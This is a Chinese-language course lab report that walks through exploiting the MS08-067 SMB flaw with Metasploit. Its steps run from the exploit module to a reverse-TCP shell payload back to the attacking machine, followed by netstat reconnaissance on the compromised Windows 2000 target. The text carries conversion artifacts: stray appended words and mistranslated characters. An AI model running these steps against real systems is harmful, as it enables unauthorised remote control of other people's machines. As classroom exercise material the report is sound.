2017-2018-2 20179205《網絡攻防技術與實踐》Windows攻擊實驗

Windows攻擊實驗

實驗描述:

使用Metaspoit攻擊MS08-067,提交正確獲得遠程shell過程的截圖(很多於五張)。shell

MS08-067漏洞介紹

  MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。windows

實驗工具

本次實驗使用的攻擊機是kali,靶機是Win2kServerapi

攻擊機:192.168.92.147
靶機:192.168.92.148

實驗步驟:

1.首先攻擊機和靶機互ping,在kali終端開啓msfconsole

2.查找是否存在ms08_067漏洞,查看返回信息,會顯示出找到的滲透模塊

3.輸入命令use exploit/windows/smb/ms08_067_netapi,進入利用該漏洞模塊。接下來可輸入一些命令來顯示一些信息,如:

輸入show payloads會顯示出有效的攻擊載荷,好比shell_reverse_tcp

使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷

輸入show targets會顯示出能夠被攻擊的靶機的操做系統型號

4.輸入show options顯示咱們須要在攻擊前須要設置的數據

5.設置攻擊機和靶機地址,並使用命令show options再次查看payload狀態

輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147;
輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;

6.輸入命令exploit開始攻擊,下圖爲正常攻擊成功結果

7.在攻擊機和靶機中分別查看IP地址,輸入ipconfig/all,發現結果一致

8.輸入「netstat -a」命令,能夠查看靶機開啓了哪些端口

9.輸入「netstat -n」命令, 查看靶機端口的網絡鏈接狀況

相關文章
相關標籤/搜索